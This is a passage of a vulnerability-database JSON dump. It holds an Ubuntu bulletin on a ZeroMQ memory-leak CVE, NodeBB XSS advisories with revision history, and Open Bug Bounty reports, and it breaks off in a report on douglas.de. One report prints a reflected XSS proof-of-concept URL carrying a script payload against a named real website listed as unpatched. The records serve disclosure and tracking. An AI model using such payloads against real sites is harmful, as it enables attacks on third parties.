"DEBIAN_DLA-2588.NASL", "PHOTONOS_PHSA-2021-1_0-0403_ZEROMQ.NASL", "FEDORA_2021-8B3202B783.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2588-1:2F08E"]}], "modified": "2021-07-23T22:25:26", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-07-23T22:25:26", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "4.3.3-1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "20.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}], "bugs": []}, "lastseen": "2021-07-23T22:25:26", "differentElements": ["cvss2", "cvss3"], "edition": 2}, {"bulletin": {"id": "UB:CVE-2021-20234", "vendorId": null, "hash": "a52cd85ec6b7d5eeb535a9905c88b341", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2021-20234", "description": "An uncontrolled resource consumption (memory leak) flaw was found in the\nZeroMQ client in versions before 4.3.3 in src/pipe.cpp. This issue causes a\nclient that connects to multiple malicious or compromised servers to crash.\nThe highest threat from this vulnerability is to system availability.", "published": "2021-04-01T00:00:00", "modified": "2021-04-01T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "href": "https://ubuntu.com/security/CVE-2021-20234", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20234", "https://github.com/zeromq/libzmq/pull/3918", "https://github.com/zeromq/libzmq/security/advisories/GHSA-wfr2-29gj-5w87", "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=22037", "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=22123", "https://nvd.nist.gov/vuln/detail/CVE-2021-20234", "https://launchpad.net/bugs/cve/CVE-2021-20234", "https://security-tracker.debian.org/tracker/CVE-2021-20234"], "cvelist": ["CVE-2021-20234"], "immutableFields": [], "lastseen": "2021-07-30T21:30:20", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20234"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-20234"]}, {"type": "photon", "idList": ["PHSA-2021-2.0-0357", "PHSA-2021-1.0-0403", "PHSA-2021-3.0-0253"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2021-2_0-0357_ZEROMQ.NASL", "PHOTONOS_PHSA-2021-1_0-0403_ZEROMQ.NASL", "DEBIAN_DLA-2588.NASL", "PHOTONOS_PHSA-2021-3_0-0253_ZEROMQ.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2588-1:2F08E"]}], "modified": "2021-07-30T21:30:20", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-07-30T21:30:20", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "4.3.3-1", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "20.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zeromq3"}], "bugs": []}, "lastseen": "2021-07-30T21:30:20", "differentElements": ["affectedPackage"], "edition": 3}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-20234"]}, {"type": "cve", "idList": ["CVE-2021-20234"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-20234"]}, {"type": "nessus", "idList": ["PHOTONOS_PHSA-2021-1_0-0403_ZEROMQ.NASL", "PHOTONOS_PHSA-2021-2_0-0357_ZEROMQ.NASL", "PHOTONOS_PHSA-2021-3_0-0253_ZEROMQ.NASL", "DEBIAN_DLA-2588.NASL"]}, {"type": "photon", "idList": ["PHSA-2021-1.0-0403", "PHSA-2021-3.0-0253", "PHSA-2021-2.0-0357"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2588-1:2F08E"]}], "modified": "2021-11-22T21:22:09", "rev": 2}, "score": {"value": 5.4, "vector": "NONE", "modified": "2021-11-22T21:22:09", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "4.3.3-1", "packageFilename": "UNKNOWN", "operator": "lt", "status": "released", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "20.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "status": "needs triage", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "18.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "status": "needs triage", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "16.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "status": "ignored", "packageName": "zeromq3"}, {"OS": "ubuntu", "OSVersion": "14.04", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "status": "needs triage", "packageName": "zeromq3"}], "bugs": [], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}], "osv": [{"id": "OSV:GHSA-72FV-QGJ6-2W2P", "vendorId": null, "hash": "387bea94d1da007e37018a6c2077deb4", "type": "osv", "bulletinFamily": "software", "title": "Cross-site Scripting in NodeBB", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-05-01T18:37:08", "modified": "2021-08-03T21:27:01", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://osv.dev/vulnerability/GHSA-72fv-qgj6-2w2p", "reporter": "Google", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2015-9286", "https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://github.com/advisories/GHSA-72fv-qgj6-2w2p"], "cvelist": [], "immutableFields": [], "lastseen": "2021-11-19T01:50:12", "history": [{"bulletin": {"id": "OSV:GHSA-72FV-QGJ6-2W2P", "vendorId": null, "hash": "8ca322ff4c2a131f75c7476fb9ce6607", "type": "osv", "bulletinFamily": "software", "title": "Cross-site Scripting in NodeBB", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-05-01T18:37:08", "modified": "2021-08-03T21:27:01", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://osv.dev/vulnerability/GHSA-72fv-qgj6-2w2p", "reporter": "Google", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2015-9286", "https://github.com/advisories/GHSA-72fv-qgj6-2w2p"], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-30T16:18:41", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}], "modified": "2021-09-30T16:18:41", "rev": 2}, "score": {"value": 1.0, "vector": "NONE", "modified": "2021-09-30T16:18:41", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": []}, "lastseen": "2021-09-30T16:18:41", "differentElements": ["references"], "edition": 1}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-11-19T01:50:12", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-11-19T01:50:12", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [], "_object_type": "robots.models.osv.OSVBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.osv.OSVBulletin"]}], "github": [{"id": "GHSA-72FV-QGJ6-2W2P", "bulletinFamily": "software", "title": "Cross-site Scripting in NodeBB", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-05-01T18:37:08", "modified": "2021-08-03T21:27:01", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://github.com/advisories/GHSA-72fv-qgj6-2w2p", "reporter": "GitHub Advisory Database", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://nvd.nist.gov/vuln/detail/CVE-2015-9286", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://github.com/advisories/GHSA-72fv-qgj6-2w2p", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "github", "lastseen": "2021-11-18T16:08:09", "history": [{"bulletin": {"affectedSoftware": [{"name": "nodebb", "operator": "lt", "version": "0.8.2"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-08-03T22:03:19", "references": [{"idList": ["CVE-2015-9286"], "type": "cve"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-08-03T22:03:19", "rev": 2, "value": 3.8, "vector": "NONE"}}, "hash": "7897030e06e1fba498dca8b9de16dcfa977bc88e5137c90c245cb8311fd0eb18", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "360f64632f98eb40d11f12b031d44561", "key": "reporter"}, {"hash": "f99ce6c18f7ebec80ceb18646f2b1261", "key": "title"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "13e7ed167bf171325c7bff40915c1ec8", "key": "published"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "773ed52ee93b0f3e5edf17fba855b77b", "key": "modified"}, {"hash": "bf215181b5140522137b3d4f6b73544a", "key": "type"}, {"hash": "0b9e7c80b52c3cb59700d519df57dc46", "key": "references"}, {"hash": "75124e35c88e9a2f2d816236e27e1bd8", "key": "href"}, {"hash": "0138d7266d2fe306e9a78351595a7c88", "key": "affectedSoftware"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}], "history": [], "href": "https://github.com/advisories/GHSA-72fv-qgj6-2w2p", "id": "GHSA-72FV-QGJ6-2W2P", "immutableFields": [], "lastseen": "2021-08-03T22:03:19", "modified": "2021-08-03T21:27:01", "objectVersion": "1.6", "published": "2019-05-01T18:37:08", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2015-9286", "https://github.com/advisories/GHSA-72fv-qgj6-2w2p"], "reporter": "GitHub Advisory Database", "title": "Cross-site Scripting in NodeBB", "type": "github", "viewCount": 5}, "different_elements": ["references"], "edition": 4, "lastseen": "2021-08-03T22:03:19"}, {"bulletin": {"affectedSoftware": [{"name": "nodebb", "operator": "lt", "version": "0.8.2"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 3, "enchantments": {"dependencies": {"modified": "2021-07-28T15:02:30", "references": [{"idList": ["CVE-2015-9286"], "type": "cve"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-07-28T15:02:30", "rev": 2, "value": 5.6, "vector": "NONE"}}, "hash": "f24b6390944baa0eccfb7d6cf5074a5493e31091950b2b3d02fad02908c4bbfb", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "360f64632f98eb40d11f12b031d44561", "key": "reporter"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "13e7ed167bf171325c7bff40915c1ec8", "key": "published"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "114293d2b227c1287b49fc041f05c58c", "key": "title"}, {"hash": "bf215181b5140522137b3d4f6b73544a", "key": "type"}, {"hash": "0b9e7c80b52c3cb59700d519df57dc46", "key": "references"}, {"hash": "75124e35c88e9a2f2d816236e27e1bd8", "key": "href"}, {"hash": "95e09b67f3f54cf5422f951ca29347e1", "key": "modified"}, {"hash": "0138d7266d2fe306e9a78351595a7c88", "key": "affectedSoftware"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}], "history": [], "href": "https://github.com/advisories/GHSA-72fv-qgj6-2w2p", "id": "GHSA-72FV-QGJ6-2W2P", "immutableFields": [], "lastseen": "2021-07-28T15:02:30", "modified": "2019-07-03T21:02:07", "objectVersion": "1.6", "published": "2019-05-01T18:37:08", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2015-9286", "https://github.com/advisories/GHSA-72fv-qgj6-2w2p"], "reporter": "GitHub Advisory Database", "title": "Moderate severity vulnerability that affects nodebb", "type": "github", "viewCount": 3}, "different_elements": ["modified", "title"], "edition": 3, "lastseen": "2021-07-28T15:02:30"}, {"bulletin": {"affectedSoftware": [{"name": "nodebb", "operator": "lt", "version": "0.8.2"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {}, "cvss3": {}, "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-03-10T23:26:02", "references": [{"idList": ["CVE-2015-9286"], "type": "cve"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-03-10T23:26:02", "rev": 2, "value": 5.6, "vector": "NONE"}}, "hash": "a6c9772c5f0d599cca331c2e8e3a435f06cd7d6821c5f8e7a6b558e86e0731e6", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "360f64632f98eb40d11f12b031d44561", "key": "reporter"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "13e7ed167bf171325c7bff40915c1ec8", "key": "published"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "114293d2b227c1287b49fc041f05c58c", "key": "title"}, {"hash": "bf215181b5140522137b3d4f6b73544a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "0b9e7c80b52c3cb59700d519df57dc46", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "75124e35c88e9a2f2d816236e27e1bd8", "key": "href"}, {"hash": "95e09b67f3f54cf5422f951ca29347e1", "key": "modified"}, {"hash": "0138d7266d2fe306e9a78351595a7c88", "key": "affectedSoftware"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}], "history": [], "href": "https://github.com/advisories/GHSA-72fv-qgj6-2w2p", "id": "GHSA-72FV-QGJ6-2W2P", "immutableFields": [], "lastseen": "2020-03-10T23:26:02", "modified": "2019-07-03T21:02:07", "objectVersion": "1.5", "published": "2019-05-01T18:37:08", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2015-9286", "https://github.com/advisories/GHSA-72fv-qgj6-2w2p"], "reporter": "GitHub Advisory Database", "title": "Moderate severity vulnerability that affects nodebb", "type": "github", "viewCount": 3}, "different_elements": ["cvss3", "cvss2"], "edition": 2, "lastseen": "2020-03-10T23:26:02"}, {"bulletin": {"affectedSoftware": [{"name": "nodebb", "operator": "lt", "version": "0.8.2"}], "bulletinFamily": "software", "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-11-21T12:50:58", "references": [{"idList": ["CVE-2015-9286"], "type": "cve"}]}, "score": {"modified": "2019-11-21T12:50:58", "value": 5.6, "vector": "NONE"}}, "hash": "db15dfb83331dfacbf4b7b19b0d601c7dd833f254f46bfbad27037c48bfe9774", "hashmap": [{"hash": "360f64632f98eb40d11f12b031d44561", "key": "reporter"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "13e7ed167bf171325c7bff40915c1ec8", "key": "published"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "2f4b606bdb23b2e45e2f27bc53c650b4", "key": "references"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "114293d2b227c1287b49fc041f05c58c", "key": "title"}, {"hash": "bf215181b5140522137b3d4f6b73544a", "key": "type"}, {"hash": "75124e35c88e9a2f2d816236e27e1bd8", "key": "href"}, {"hash": "95e09b67f3f54cf5422f951ca29347e1", "key": "modified"}, {"hash": "0138d7266d2fe306e9a78351595a7c88", "key": "affectedSoftware"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}], "history": [], "href": "https://github.com/advisories/GHSA-72fv-qgj6-2w2p", "id": "GHSA-72FV-QGJ6-2W2P", "lastseen": "2019-11-21T12:50:58", "modified": "2019-07-03T21:02:07", "objectVersion": "1.3", "published": "2019-05-01T18:37:08", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2015-9286"], "reporter": "GitHub Advisory Database", "title": "Moderate severity vulnerability that affects nodebb", "type": "github", "viewCount": 1}, "differentElements": ["references"], "edition": 1, "lastseen": "2019-11-21T12:50:58"}], "edition": 5, "hashmap": [{"key": "affectedSoftware", "hash": "0138d7266d2fe306e9a78351595a7c88"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295"}, {"key": "cvss", "hash": "f74a1c24e49a5ecb0eefb5e51d4caa14"}, {"key": "cvss2", "hash": "4419eb17de947d4d6b67ac07ed8d9064"}, {"key": "cvss3", "hash": "f9048d548aea2a33f8c8fe44e8c9817c"}, {"key": "description", "hash": "7bcda725e0fe4634bd741d18870efc86"}, {"key": "href", "hash": "75124e35c88e9a2f2d816236e27e1bd8"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "773ed52ee93b0f3e5edf17fba855b77b"}, {"key": "published", "hash": "13e7ed167bf171325c7bff40915c1ec8"}, {"key": "references", "hash": "020dfd399bebfabae354bf91b8e1513b"}, {"key": "reporter", "hash": "360f64632f98eb40d11f12b031d44561"}, {"key": "title", "hash": "f99ce6c18f7ebec80ceb18646f2b1261"}, {"key": "type", "hash": "bf215181b5140522137b3d4f6b73544a"}], "hash": "48a11607907d609624c36f9e2b416bedf747425782c298915ebc6c3148bbb1e4", "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-9286"]}, {"type": "github", "idList": ["GHSA-72FV-QGJ6-2W2P"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32625"]}], "modified": "2021-11-18T16:08:09", "rev": 2}, "score": {"value": 4.1, "vector": "NONE", "modified": "2021-11-18T16:08:09", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"name": "nodebb", "operator": "lt", "version": "0.8.2"}], "scheme": null, "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}}], "openbugbounty": [{"id": "OBB:603149", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "radiopopolare.it XSS vulnerability ", "description": "##### Open Bug Bounty ID: OBB-603149\n\nDescription| Value \n---|--- \nAffected Website:| radiopopolare.it \nOpen Bug Bounty Program:| Create your bounty program now. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nDisclosure Standard:| Coordinated Disclosure based on ISO 29147 guidelines \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n http://www.radiopopolare.it/?s=%3Cscript%3Ealert(%22123%22)%3C%2Fscript%3E\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 16 April, 2018 23:54 GMT \nVulnerability Verified:| 17 April, 2018 00:07 GMT \nWebsite Operator Notified:| 17 April, 2018 00:07 GMT \nPublic Report Published[without any technical details]:| 17 April, 2018 00:07 GMT \nPublic Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 15 July, 2018 23:54 GMT\n", "published": "2018-04-16T23:54:00", "modified": "2018-07-15T23:54:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/603149/", "reporter": "P3ACE_dc2298", "references": [], "cvelist": [], "lastseen": "2018-07-16T15:13:12", "history": [{"bulletin": {"id": "OBB:603149", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "radiopopolare.it XSS vulnerability", "description": "##### Open Bug Bounty ID: OBB-603149\n\nDescription| Value \n---|--- \nAffected Website:| radiopopolare.it \nOpen Bug Bounty Program:| Create your bounty program now. It's open and free. \nVulnerable Application:| [hidden until disclosure] \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| [hidden until disclosure] \nDisclosure Standard:| Coordinated Disclosure based on ISO 29147 guidelines \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 16 April, 2018 23:54 GMT \nVulnerability Verified:| 17 April, 2018 00:07 GMT \nWebsite Operator Notified:| 17 April, 2018 00:07 GMT \nVulnerability Published [without any technical details]:| 17 April, 2018 00:07 GMT \nPublic Disclosure:| Sheduled on 15 July, 2018 23:54 GMT\n", "published": "2018-04-16T23:54:00", "modified": "2018-04-16T23:54:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.openbugbounty.org/reports/603149/", "reporter": "P3ACE_dc2298", "references": [], "cvelist": [], "lastseen": "2018-04-17T15:03:23", "history": [], "viewCount": 0, "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "on hold", "mirror": ""}}, "lastseen": "2018-04-17T15:03:23", "differentElements": ["description", "modified", "openbugbounty", "title"], "edition": 1}], "viewCount": 1, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-07-16T15:13:12", "rev": 2}, "dependencies": {"references": [], "modified": "2018-07-16T15:13:12", "rev": 2}}, "objectVersion": "1.4", "openbugbounty": {"patchStatus": "unpatched", "mirror": "http://603149.openbounty.org/mirror/"}, "_object_type": "robots.models.openbugbounty.OpenbugbountyBulletin", "_object_types": ["robots.models.openbugbounty.OpenbugbountyBulletin", "robots.models.base.Bulletin"]}, {"id": "OBB:429751", "type": "openbugbounty", "bulletinFamily": "bugbounty", "title": "douglas.de XSS vulnerability ", "description": "##### Open Bug Bounty ID: OBB-429751\n\nDescription| Value \n---|--- \nAffected Website:| douglas.de \nOpen Bug Bounty Program:| Create your bounty program now. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n 